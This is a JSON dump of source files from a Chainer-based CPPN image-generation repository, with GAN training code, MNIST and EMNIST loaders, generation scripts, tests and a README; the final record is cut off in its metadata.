[ { "alpha_fraction": 0.561020016670227, "alphanum_fraction": 0.5846994519233704, "avg_line_length": 32.61224365234375, "blob_id": "fa39f9bfcab27120f4ae80e0476c5dfa66ea02b8", "content_id": "1b06e7ac98ef4cff9733a6c904c104f874a03e28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1647, "license_type": "no_license", "max_line_length": 106, "num_lines": 49, "path": "/cppn/input_data.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import dataclasses\n\nimport numpy\nfrom scipy.stats import truncnorm\n\n\ndef truncated_normal(x, a=-1, b=1, mean=0.5, std=0.2):\n \"\"\" Normal dist. [a, b] \"\"\"\n return truncnorm.pdf(x, (a - mean) / std, (b - mean) / std, loc=mean, scale=std).astype(numpy.float32)\n\n\ndef sample_z(z_size):\n return truncated_normal(numpy.random.rand(z_size))\n\n\ndef interp_z(z1, z2, n_points):\n \"\"\" Linear interpolation between z1 and z2 \"\"\"\n return [a * z1 + (1.0 - a) * z2 for a in numpy.linspace(0, 1, n_points)]\n\n\[email protected]\nclass InputData:\n \"\"\" Helper class to generate inputs for CPPN \"\"\"\n width: int\n height: int\n z_size: int\n\n def __post_init__(self):\n \"\"\" Initialize x, y, and r \"\"\"\n assert self.width > 0\n assert self.height > 0\n self.x, self.y = numpy.meshgrid(\n numpy.linspace(0, 1, self.width).astype(numpy.float32),\n numpy.linspace(0, 1, self.height).astype(numpy.float32))\n self.r = numpy.sqrt(numpy.square(self.x) + numpy.square(self.y))\n\n def as_batch(self, z=None):\n \"\"\" Return x, y, r, z as batch [width * height, 3 + z_size] \"\"\"\n if z is None:\n z = sample_z(self.z_size)\n assert z.shape == (self.z_size, )\n\n return numpy.concatenate((self.x.reshape(-1, 1), self.y.reshape(-1, 1), self.r.reshape(-1, 1)),\n axis=1), numpy.tile(z, (self.width * self.height, 1))\n\n def sample_z(self, batch_size):\n \"\"\" sample batch of z \"\"\"\n z = [numpy.tile(sample_z(self.z_size), (self.width * self.height, 1)) for _ in range(batch_size)]\n return numpy.concatenate(z, axis=0)\n" }, { "alpha_fraction": 0.536796510219574, "alphanum_fraction": 0.6017315983772278, "avg_line_length": 22.100000381469727, "blob_id": "765632c52a9b912c4a0f70193dcb190f7c8f9feb", "content_id": "b0fd1ff9022ad54a4275c595623cdbe689ff4ce9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 51, "num_lines": 10, "path": "/test/test_input_data.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from cppn.input_data import InputData\n\n\ndef test_input_data():\n data = InputData(width=12, height=14, z_size=2)\n x, z = data.as_batch()\n\n # check shape\n assert x.shape == (12 * 14, 3)\n assert z.shape == (12 * 14, 2)\n" }, { "alpha_fraction": 0.6357588171958923, "alphanum_fraction": 0.6432432532310486, "avg_line_length": 28.703702926635742, "blob_id": "392b548db8c34764fa2fa80d871cdcfca288f7dc", "content_id": "2470a6977c74891d6cd9fd8fcc8f234052a05fab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2405, "license_type": "no_license", "max_line_length": 108, "num_lines": 81, "path": "/experiments/gen_images.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\nimport argparse\nimport os\nimport sys\nfrom pathlib import Path\n\nimport numpy\nfrom PIL import Image\n\nfrom cppn.input_data import InputData, interp_z, sample_z\nfrom cppn.model import CPPN, ModelConfig\nfrom cppn.post_process_output import post_process_output\nimport chainer\n\n\ndef gen_images():\n parser = argparse.ArgumentParser(description=\"multiple images as single image\")\n parser.add_argument('--out', type=Path, default=Path('./tmp/out.png'))\n parser.add_argument('--n_rows', type=int, default=5)\n parser.add_argument('--n_cols', type=int, default=5)\n parser.add_argument('--model_config_path', type=Path, default=Path('./conf/model.yaml'))\n parser.add_argument('--gpu', type=int, default=-1)\n parser.add_argument('--load', type=Path)\n parser.add_argument('--size', type=int)\n args = parser.parse_args()\n\n batch_size = args.n_rows * args.n_cols\n\n # init model\n model_config = ModelConfig.load(args.model_config_path)\n model = CPPN(model_config)\n\n # override size of output\n if args.size:\n model_config.width = args.size\n model_config.height = args.size\n\n if args.load:\n assert args.load.exists()\n print(f\"load model from {args.load}\")\n chainer.serializers.load_npz(args.load, model)\n\n # model to gpu\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n model.to_gpu()\n\n # init x and z\n input_data = InputData(width=model_config.width, height=model_config.height, z_size=model_config.z_size)\n\n x, z = [], []\n for _ in range(batch_size):\n _x, _z = input_data.as_batch()\n x.append(_x)\n z.append(_z)\n\n x = numpy.concatenate(x)\n z = numpy.concatenate(z)\n\n # to device\n xp = model.xp\n x = chainer.Variable(xp.asarray(x))\n z = chainer.Variable(xp.asarray(z))\n\n y = model.forward(x, z)\n y = chainer.cuda.to_cpu(y.data)\n\n # chainer variable [B, 1, W, H], float [0, 1] -> numpy array uint8 [0, 255]\n y = post_process_output(y)\n y = y.reshape((args.n_rows, args.n_cols, 1, input_data.height, input_data.width))\n y = y.transpose((0, 3, 1, 4, 2))\n y = y.reshape((args.n_rows * input_data.height, args.n_cols * input_data.width))\n Image.fromarray(y).save(args.out)\n\n\nif __name__ == '__main__':\n gen_images()" }, { "alpha_fraction": 0.4997383654117584, "alphanum_fraction": 0.5206698179244995, "avg_line_length": 30.327869415283203, "blob_id": "cea955c54ccfc83a8bacece13ec3b62b71c75094", "content_id": "cd7fa6e4cf5fdb6f933c0c219415ab04a3ea2f6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1911, "license_type": "no_license", "max_line_length": 111, "num_lines": 61, "path": "/test/test_forward.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import numpy\n\nfrom cppn.conditional_model import ConditionalCPPN, ConditionalModelConfig\nfrom cppn.input_data import InputData\nfrom cppn.model import CPPN, ModelConfig\n\n\ndef get_dammy_input(batch, width, height, channel):\n x = numpy.random.rand(batch, channel, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef test_unconditional_forward():\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n\n model = CPPN(ModelConfig(width=width, height=height, n_units_xyrz=3, n_hidden_units=[5, 5], z_size=z_size))\n\n x, z = [], []\n for _ in range(batch_size):\n _x, _z = InputData(width=width, height=height, z_size=z_size).as_batch()\n x.append(_x)\n z.append(_z)\n x = numpy.concatenate(x, axis=0)\n z = numpy.concatenate(z, axis=0)\n\n y = model.forward(x, z)\n assert y.shape == (batch_size, 1, width, height)\n\n\ndef test_conditional_forward():\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n batch_size = 3\n model = ConditionalCPPN(\n ConditionalModelConfig(width=width,\n height=height,\n n_units_xyr=3,\n n_hidden_units=[\n 10,\n 10,\n ],\n z_size=z_size,\n in_width=64,\n in_height=64,\n in_channel=1))\n x, z = [], []\n for _ in range(batch_size):\n _x, _z = InputData(width=width, height=height, z_size=z_size).as_batch()\n x.append(_x)\n z.append(_z)\n x = numpy.concatenate(x, axis=0)\n z = numpy.concatenate(z, axis=0)\n c = get_dammy_input(batch_size, 64, 64, 1) # init dammy conditional input\n y = model.forward(x, z, c)\n assert y.shape == (batch_size, 1, width, height)\n" }, { "alpha_fraction": 0.6698873043060303, "alphanum_fraction": 0.6744254231452942, "avg_line_length": 39.90419006347656, "blob_id": "99fa16f3411497fa4ccf52ffdc3bfe36134f70bb", "content_id": "3a48efc0b8bc1af36a9aaee2b378ae9410bd753f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6831, "license_type": "no_license", "max_line_length": 160, "num_lines": 167, "path": "/experiments/train.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "\"\"\" Train CPPN model with image dataset \"\"\"\n# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\nimport typing\n\nimport argparse\nimport dataclasses\nimport shutil\nfrom pathlib import Path\n\nimport chainer\nfrom chainer import training\nfrom chainer.training import extension, extensions\n\nfrom cppn import (config_base, model, my_dataset, my_updater, sn_discriminator,\n trainer_util)\nfrom cppn.model import ModelConfig\n\nfrom cppn.mnist_dataset import MnistDataset\nfrom cppn.emnist_dataset import EMnistDataset\n\n\[email protected]\nclass TrainConfig(config_base.ConfigBase):\n \"\"\" Training configuration \"\"\"\n max_iter: int # max number of training iteration\n batch_size: int\n snapshot_iter_interval: int\n display_iter_interval: int\n evaluation_iter_interval: int\n n_discriminator_update: int\n display_iter_interval: int\n emnist_data_path: str\n dataset_type: str = 'original'\n train_image_dir_path: typing.Optional[Path] = None # root directory of image files\n train_image_path_txt: typing.Optional[Path] = None # path to text files of image file paths\n alpha: float = 0.0002 # alpha of adam optimizer\n beta1: float = 0.0 # beta1 of adam optimizer\n beta2: float = 0.9 # beta2 of adam optimizer\n discriminator_ch_size: int = 24 # size of discriminator filter\n\n\ndef init_optimizer(model, alpha, beta1, beta2):\n \"\"\" initialize optimizer with model \"\"\"\n opt = chainer.optimizers.Adam(alpha=alpha, beta1=beta1, beta2=beta2)\n opt.setup(model)\n return opt\n\n\ndef train(log_dir_path: Path, train_config: TrainConfig, model_config: model.ModelConfig, load: typing.Optional[Path]=None, device: int=-1):\n \"\"\" Train CPPN model on image dataset \"\"\"\n # init dataset\n\n \n # init dataset\n if train_config.dataset_type == 'mnist':\n train_dataset = MnistDataset(width=model_config.width, height=model_config.height, z_size=model_config.z_size)\n elif train_config.dataset_type == 'emnist':\n assert train_config.emnist_data_path is not None, \"emnist_data_path should be specified\"\n train_dataset = EMnistDataset(width=model_config.width, height=model_config.height, z_size=model_config.z_size, data_path=train_config.emnist_data_path)\n elif train_config.dataset_type == 'original':\n # init path of image files\n if train_config.train_image_dir_path is not None:\n paths = list(train_config.train_image_dir_path.glob('*.jpg')) # TODO: take also PNG images\n elif train_config.train_image_path_txt is not None:\n with open(train_config.train_image_path_txt) as f:\n paths = f.readlines()\n paths = [ p.split('\\n')[0] for p in paths ]\n else:\n raise RuntimeError('train_image_dir_path or train_image_path_txt should be specified')\n train_dataset = my_dataset.MyDataset(paths, model_config.width, model_config.height, model_config.z_size)\n else:\n raise NotImplementedError\n\n train_iterator = chainer.iterators.SerialIterator(train_dataset, train_config.batch_size)\n\n # init generator\n generator = model.CPPN(model_config)\n\n if load:\n chainer.serializers.load_npz(load, generator)\n\n # init discriminator\n discriminator = sn_discriminator.SNDiscriminator(ch=train_config.discriminator_ch_size)\n \n print(f\"generator size = {generator.count_params()}, discriminator_size = {discriminator.count_params()}\")\n\n # copy model to device\n if device >= 0:\n chainer.cuda.get_device_from_id(device).use()\n generator.to_gpu()\n discriminator.to_gpu()\n\n # init optimizers\n gen_opt = init_optimizer(generator, train_config.alpha, train_config.beta1, train_config.beta2)\n dis_opt = init_optimizer(discriminator, train_config.alpha, train_config.beta1, train_config.beta2)\n\n # init updater\n updater = my_updater.MyUpdater(iterator=train_iterator,\n gen=generator,\n dis=discriminator,\n gen_opt=gen_opt,\n dis_opt=dis_opt,\n input_data=train_dataset.input_data,\n n_discriminator_update=train_config.n_discriminator_update,\n device=device)\n trainer = training.Trainer(updater, (train_config.max_iter, 'iteration'), out=log_dir_path)\n\n # --- init updater's hooks (logging)\n # snapshot of models\n trainer.extend(extensions.snapshot_object(generator, 'generator_{.updater.iteration}.npz'),\n trigger=(train_config.snapshot_iter_interval, 'iteration'))\n trainer.extend(extensions.snapshot_object(discriminator, 'discriminator_{.updater.iteration}.npz'),\n trigger=(train_config.snapshot_iter_interval, 'iteration'))\n\n # report log\n report_keys = [\"loss_dis\", \"loss_gen\"]\n trainer.extend(extensions.LogReport(keys=report_keys, trigger=(train_config.display_iter_interval, 'iteration')))\n trainer.extend(extensions.PrintReport(report_keys), trigger=(train_config.display_iter_interval, 'iteration'))\n trainer.extend(trainer_util.sample_generate(generator, log_dir_path, train_dataset.input_data),\n trigger=(train_config.evaluation_iter_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\n trainer.extend(extensions.ProgressBar(update_interval=10))\n\n # start training\n trainer.run()\n\n\ndef start_train():\n parser = argparse.ArgumentParser(description=\"Training CPPN model\")\n parser.add_argument('log_dir_path', type=Path)\n parser.add_argument('--train_config_path', type=Path, default='./conf/train.yaml')\n parser.add_argument('--model_config_path', type=Path, default='./conf/model.yaml')\n parser.add_argument('--load', type=Path)\n parser.add_argument('--device', type=int, default=0)\n parser.add_argument('--overwrite', action='store_true')\n args = parser.parse_args()\n\n # init log_dir\n args.log_dir_path.mkdir(parents=False, exist_ok=args.overwrite)\n\n # load train config\n train_config = TrainConfig.load(args.train_config_path)\n\n # load model config\n model_config = ModelConfig.load(args.model_config_path)\n\n # check load\n if args.load:\n assert args.load.exists()\n\n # store execution info to log_dir\n trainer_util.snap_exec_info(args.log_dir_path, args)\n\n # copy configs to log dir\n shutil.copyfile(args.train_config_path, args.log_dir_path / args.train_config_path.name)\n shutil.copyfile(args.model_config_path, args.log_dir_path / args.model_config_path.name)\n\n # start train\n train(args.log_dir_path, train_config, model_config, args.load, args.device)\n\n\nif __name__ == '__main__':\n start_train()\n" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 19.428571701049805, "blob_id": "ba446438902b7acbd6c6e0923bc241692e2166b0", "content_id": "f9f83c9d4a6d08dfe1a66bb26e0356681c28e755", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/test/test_discriminator.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\n\nfrom cppn import sn_discriminator\n\n\ndef get_dammy_input(batch, width, height, channel):\n x = numpy.random.rand(batch, channel, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef test_forward():\n batch = 1\n width = 64\n height = 64\n channel = 1\n\n # init model\n discriminator = sn_discriminator.SNDiscriminator()\n\n # init dammy input\n x = chainer.Variable(get_dammy_input(batch, width, height, channel))\n\n # forward prop\n y = discriminator.forward(x)\n\n assert y.shape == (batch, 1)\n" }, { "alpha_fraction": 0.5688003301620483, "alphanum_fraction": 0.5703334808349609, "avg_line_length": 36.81159591674805, "blob_id": "7cd20b97336bfe0621579fc5874a5e823b5df5b0", "content_id": "4d7389279ad01189794b132d7bd2a63444f138ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2609, "license_type": "no_license", "max_line_length": 103, "num_lines": 69, "path": "/cppn/my_updater.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport chainer.functions as F\nimport numpy\n\nfrom cppn import input_data, model\n\n\nclass MyUpdater(chainer.training.StandardUpdater):\n \"\"\" Update discriminator and generator with unconditional generation \"\"\"\n def __init__(self, iterator: chainer.iterators.SerialIterator, gen: model.CPPN, dis: chainer.Chain,\n gen_opt: chainer.optimizer.Optimizer, dis_opt: chainer.optimizer.Optimizer,\n input_data: input_data.InputData, n_discriminator_update: int, device: int):\n self.generator = gen\n self.discriminator = dis\n self.gen_opt = gen_opt\n self.dis_opt = dis_opt\n self.input_data = input_data\n self.n_discriminator_update = n_discriminator_update\n\n optimizers = {'gen_opt': gen_opt, 'dis_opt': dis_opt}\n iterator = {'main': iterator}\n super(MyUpdater, self).__init__(iterator=iterator, optimizer=optimizers, device=device)\n\n def update_core(self):\n gen_opt = self.get_optimizer('gen_opt')\n dis_opt = self.get_optimizer('dis_opt')\n xp = self.generator.xp\n\n for i in range(self.n_discriminator_update):\n batch = self.get_iterator('main').next()\n batch_size = len(batch)\n x, z, c = [], [], []\n for b in batch:\n x.append(b[0])\n z.append(b[1])\n c.append(b[2])\n\n # ndarray -> variable\n x = chainer.Variable(xp.asarray(numpy.concatenate(x)))\n z = chainer.Variable(xp.asarray(numpy.concatenate(z)))\n c = chainer.Variable(xp.asarray(numpy.concatenate(c)))\n\n if i == 0:\n # generator\n x_fake = self.generator.forward(x, z)\n y_fake = self.discriminator.forward(x_fake)\n loss_gen = F.sum(F.softplus(-y_fake)) / batch_size\n self.generator.cleargrads()\n loss_gen.backward()\n gen_opt.update()\n chainer.reporter.report({'loss_gen': loss_gen})\n\n y_real = self.discriminator.forward(c)\n\n z = self.input_data.sample_z(batch_size)\n z = chainer.Variable(xp.asarray(z))\n\n x_fake = self.generator(x, z)\n y_fake = self.discriminator(x_fake)\n x_fake.unchain_backward()\n\n loss_dis = F.sum(F.softplus(-y_real)) / batch_size\n loss_dis += F.sum(F.softplus(y_fake)) / batch_size\n\n self.discriminator.cleargrads()\n loss_dis.backward()\n dis_opt.update()\n\n chainer.reporter.report({'loss_dis': loss_dis})\n" }, { "alpha_fraction": 0.598531186580658, "alphanum_fraction": 0.6070991158485413, "avg_line_length": 29.259260177612305, "blob_id": "e4451a853cd4e89abc977f47ec5964300ed5afdc", "content_id": "918779ef28a582aa78e419ac15f23cc2002f1bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/experiments/extract_image_paths.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport argparse\nimport numpy\n\ndef extract_image_paths(target_dir_path: Path, out_path: Path, N: int):\n \"\"\" Extract N file paths from taret_dir_path \"\"\"\n n = 0\n with open(out_path, 'w') as f:\n for target in target_dir_path.glob('*.jpg'):\n f.write(str(target) + '\\n')\n n += 1\n if n >= N:\n break\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('target_dir_path', type=Path)\n parser.add_argument('out_path', type=Path)\n parser.add_argument('--n', type=int, default=10000)\n args = parser.parse_args()\n\n # check arguments\n assert args.target_dir_path.exists()\n assert args.out_path.parent.exists()\n\n extract_image_paths(args.target_dir_path, args.out_path, args.n)\n" }, { "alpha_fraction": 0.5979652404785156, "alphanum_fraction": 0.6048572659492493, "avg_line_length": 26.95412826538086, "blob_id": "b80a64b5ac1e8b50995b76b9597656e160c9dbb4", "content_id": "ed5163dfb46112b3897939c830c40328c8526485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3047, "license_type": "no_license", "max_line_length": 108, "num_lines": 109, "path": "/experiments/interp_movie.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "\"\"\" Genarate GIF movie of latent space linear interpolation with untrained model \"\"\"\n# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\n\nimport argparse\nimport os\nimport sys\nfrom pathlib import Path\n\nimport numpy\nfrom PIL import Image\n\nfrom cppn.input_data import InputData, interp_z, sample_z\nfrom cppn.model import CPPN, ModelConfig\nfrom cppn.post_process_output import post_process_output\nimport chainer\n\n\n\ndef interp_movie():\n parser = argparse.ArgumentParser(description=\"Gen gif movie\")\n parser.add_argument('--out', type=Path, default=Path('./tmp/out.gif'))\n parser.add_argument('--frames', type=int, default=10)\n parser.add_argument('--z_points', type=int, default=10)\n parser.add_argument('--batch_size', type=int, default=50)\n parser.add_argument('--model_config_path', type=Path, default=Path('./conf/model.yaml'))\n parser.add_argument('--gpu', type=int, default=-1)\n parser.add_argument('--load', type=Path)\n parser.add_argument('--size', type=int)\n args = parser.parse_args()\n\n # create directory to put result\n args.out.parent.mkdir(exist_ok=True)\n\n # init model\n model_config = ModelConfig.load(args.model_config_path)\n\n # override size of output\n if args.size:\n model_config.width = args.size\n model_config.height = args.size\n\n model = CPPN(model_config)\n\n if args.load:\n assert args.load.exists()\n print(f\"load model from {args.load}\")\n chainer.serializers.load_npz(args.load, model)\n\n # model to gpu\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n model.to_gpu()\n\n # init x and z\n input_data = InputData(width=model_config.width, height=model_config.height, z_size=model_config.z_size)\n\n # gen frames\n images = []\n \n zs = []\n for _ in range(args.z_points):\n zs.extend(\n interp_z(sample_z(model_config.z_size), sample_z(model_config.z_size), args.frames)\n )\n\n for i in range(0, len(zs), args.batch_size):\n\n begin_idx = i\n end_idx = min(i + args.batch_size, len(zs) - 1)\n print(f\"{begin_idx} -> {end_idx}\")\n\n # make input batch\n x = []\n z = []\n for _z in zs[begin_idx:end_idx]:\n _x, _z = input_data.as_batch(z=_z)\n x.append(_x)\n z.append(_z)\n \n if len(x) == 0:\n break\n \n x = numpy.concatenate(x)\n z = numpy.concatenate(z)\n\n # to device\n xp = model.xp\n x = chainer.Variable(xp.asarray(x))\n z = chainer.Variable(xp.asarray(z))\n\n y = model.forward(x, z)\n y = chainer.cuda.to_cpu(y.data)\n\n # chainer variable [B, 1, W, H], float [0, 1] -> numpy array uint8 [0, 255]\n y = post_process_output(y)\n\n for _y in y:\n images.append(Image.fromarray(_y[0]))\n\n # save as gif\n images[0].save(str(args.out), save_all=True, append_images=images)\n\n\nif __name__ == '__main__':\n interp_movie()\n" }, { "alpha_fraction": 0.5958059430122375, "alphanum_fraction": 0.6011512875556946, "avg_line_length": 29.78481101989746, "blob_id": "31a10523b890ed29a016c9bb38aa29684b4d304b", "content_id": "1934efbbb01f52c92627ad0d6d9fac183e38a284", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2432, "license_type": "no_license", "max_line_length": 116, "num_lines": 79, "path": "/cppn/trainer_util.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import subprocess\nfrom pathlib import Path\n\nimport chainer\nimport numpy\nimport yaml\nfrom PIL import Image\n\nfrom cppn.post_process_output import post_process_output\n\n\ndef sample_generate(generator, save_dir_path, input_data, rows=5, cols=5, seed=0):\n \"\"\" Perform rows*cols images random generation \"\"\"\n @chainer.training.make_extension()\n def make_image(trainer):\n numpy.random.seed(seed)\n xp = generator.xp\n\n N = rows * cols # number of images\n\n # make x and z\n x, z = [], []\n for _ in range(N):\n _x, _z = input_data.as_batch()\n x.append(_x)\n z.append(_z)\n\n x = numpy.concatenate(x)\n z = numpy.concatenate(z)\n\n x = chainer.Variable(xp.asarray(x))\n z = chainer.Variable(xp.asarray(z))\n\n with chainer.using_config('train', False), chainer.using_config('enable_backprop', False):\n x = generator.forward(x, z)\n\n x = chainer.cuda.to_cpu(x.data)\n numpy.random.seed()\n\n # float -> uint8\n x = post_process_output(x)\n\n x = x.reshape((rows, cols, 1, input_data.height, input_data.width))\n x = x.transpose((0, 3, 1, 4, 2))\n x = x.reshape(\n (rows * input_data.height, cols * input_data.width)) # output is gray scale so that image array is 2dim\n\n preview_dir = save_dir_path / 'preview'\n preview_dir.mkdir(exist_ok=True, parents=False)\n\n save_path = preview_dir / 'image{:0>8}.png'.format(trainer.updater.iteration)\n Image.fromarray(x).save(save_path)\n\n return make_image\n\n\ndef snap_exec_info(log_dir_path, argparse_args):\n \"\"\" Save execution info to log_dir_path \"\"\"\n\n # commandline args\n def process_val(val):\n if isinstance(val, Path):\n return str(val)\n else:\n return val\n\n argparse_args = {key: process_val(val) for key, val in vars(argparse_args).items()}\n with open(log_dir_path / 'args.yaml', 'w') as f:\n yaml.dump(argparse_args, f)\n\n # git status\n def save_cmd_output(save_path, cmd):\n with open(save_path, 'wb') as f:\n f.write(subprocess.check_output(cmd.split()))\n\n save_cmd_output(log_dir_path / \"git-head.txt\", \"git rev-parse HEAD\")\n save_cmd_output(log_dir_path / \"git-status.txt\", \"git status\")\n save_cmd_output(log_dir_path / \"git-log.txt\", \"git log\")\n save_cmd_output(log_dir_path / \"git-diff.txt\", \"git diff\")\n" }, { "alpha_fraction": 0.5557447075843811, "alphanum_fraction": 0.5821276307106018, "avg_line_length": 32.599998474121094, "blob_id": "40e8371f282440acc1be278c06e5d6eac5b20f1f", "content_id": "eab5b228d199a7046edc33cdbbc10fe874f3b29d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1175, "license_type": "no_license", "max_line_length": 95, "num_lines": 35, "path": "/cppn/emnist_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\nfrom PIL import Image\nimport gzip\nfrom pathlib import Path\nfrom cppn.input_data import InputData\n\n\nclass EMnistDataset(chainer.dataset.DatasetMixin):\n def __init__(self, width: int, height: int, z_size: int, data_path: Path):\n self.width = width\n self.height = height\n self.z_size = z_size\n self.input_data = InputData(self.width, self.height, self.z_size)\n\n # load image data\n with gzip.open(data_path, 'rb') as f:\n self.data = numpy.frombuffer(f.read(), numpy.uint8, offset=16).reshape(-1, 28 * 28)\n\n super(EMnistDataset, self).__init__()\n\n def __len__(self):\n return len(self.data)\n\n def get_example(self, i: int):\n \"\"\" Return batch of image [1, 1, S, S], where S = `size` \"\"\"\n x, z = self.input_data.as_batch()\n \n c = self.data[i] # [0, 255]\n c = c * -1 + 255 # flip\n c = c.reshape((28, 28)).T\n image = Image.fromarray(c).resize((self.width, self.height)) \n c = numpy.asarray(image).astype(numpy.float32) / 255.0 # 2D array\n c = c.reshape((1, 1, self.width, self.height))\n return x, z, c" }, { "alpha_fraction": 0.6793892979621887, "alphanum_fraction": 0.6851145029067993, "avg_line_length": 13.971428871154785, "blob_id": "3ecec2512a6f61e132c4d37a0d4291732a2cba9d", "content_id": "317d3e3f3cbe17c6dc01f7dfbc82d8eb656391f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 524, "license_type": "no_license", "max_line_length": 86, "num_lines": 35, "path": "/README.md", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "## CPPN\n\nImplementation of CPPN using Chainer\n\n### Dependencies\n\nSee `requirements.txt`\n\n### How to init\n\n```bash\ngit submodule init\ngit submodule update\npip install -r requirements.txt\n```\n\nFor gpu support, install [CuPy](https://docs-cupy.chainer.org/en/latest/install.html).\n\n### How to test\n\n```\nPYTHONPATH=. pytest test\n```\n\n### Format code for commit\n\n```bash\nautoflake --in-place --remove-all-unused-imports `foo.py`\nisort -y `foo.py`\nyapf --in-place --style='{column_limit: 120}' `foo.py`\n```\n\n### Basic usage\n\nTBD\n" }, { "alpha_fraction": 0.557209312915802, "alphanum_fraction": 0.5823255777359009, "avg_line_length": 33.709678649902344, "blob_id": "07def4448d6a38064b3bd7ac94099e9c433d1fed", "content_id": "400b9a42698e8ac62e233203568c3fbaa0431812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1075, "license_type": "no_license", "max_line_length": 88, "num_lines": 31, "path": "/cppn/mnist_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\nfrom PIL import Image\nfrom cppn.input_data import InputData\n\n\nclass MnistDataset(chainer.dataset.DatasetMixin):\n def __init__(self, width: int, height: int, z_size: int):\n self.width = width\n self.height = height\n self.z_size = z_size\n self.input_data = InputData(self.width, self.height, self.z_size)\n\n # use only train dataset\n self.train_data, _ = chainer.datasets.get_mnist()\n super(MnistDataset, self).__init__()\n \n def __len__(self):\n return len(self.train_data)\n\n def get_example(self, i: int):\n \"\"\" Return batch of image [1, 1, S, S], where S = `size` \"\"\"\n x, z = self.input_data.as_batch()\n\n c, _ = self.train_data[i]\n c = c * -1 + 1.0 # flip [0, 1] -> [1, 0]\n c = c.reshape((28, 28)) * 255.0\n image = Image.fromarray(c.astype(numpy.uint8)).resize((self.width, self.height))\n c = numpy.asarray(image).astype(numpy.float32) / 255.0 # 2D array\n c = c.reshape((1, 1, self.width, self.height))\n return x, z, c" }, { "alpha_fraction": 0.7226890921592712, "alphanum_fraction": 0.7226890921592712, "avg_line_length": 26.461538314819336, "blob_id": "f38ac9087a923e37244b89ee180c05aa229ea380", "content_id": "d94a1fdb7b518e5c2110293caa7e1dc37863f736", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 102, "num_lines": 13, "path": "/cppn/init_logger.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import logging\n\nimport colorlog\n\n\ndef init_logger(name):\n logger = logging.getLogger(name)\n handler = colorlog.StreamHandler()\n handler.setFormatter(colorlog.ColoredFormatter('%(log_color)s%(levelname)s:%(name)s:%(message)s'))\n logger = colorlog.getLogger('example')\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n" }, { "alpha_fraction": 0.5922746658325195, "alphanum_fraction": 0.6437768340110779, "avg_line_length": 22.299999237060547, "blob_id": "c50547e879b57a25423e7cf0d745ec73f38831e9", "content_id": "742f6df34bbd540225d06fd91af8bc2a5b63f273", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 64, "num_lines": 10, "path": "/cppn/post_process_output.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\n\n\ndef post_process_output(x):\n \"\"\" convert output of CPPN -> uint8 array \"\"\"\n if isinstance(x, chainer.Variable):\n x = x.data\n\n return numpy.clip(x * 255.0, 0.0, 255.0).astype(numpy.uint8)\n" }, { "alpha_fraction": 0.6300856471061707, "alphanum_fraction": 0.6418629288673401, "avg_line_length": 28.203125, "blob_id": "fbea175365795d3cfa1054aa37fef4bec7dc2337", "content_id": "7315c0ef80bd628b77ddebae5b62f62361c2e601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1868, "license_type": "no_license", "max_line_length": 124, 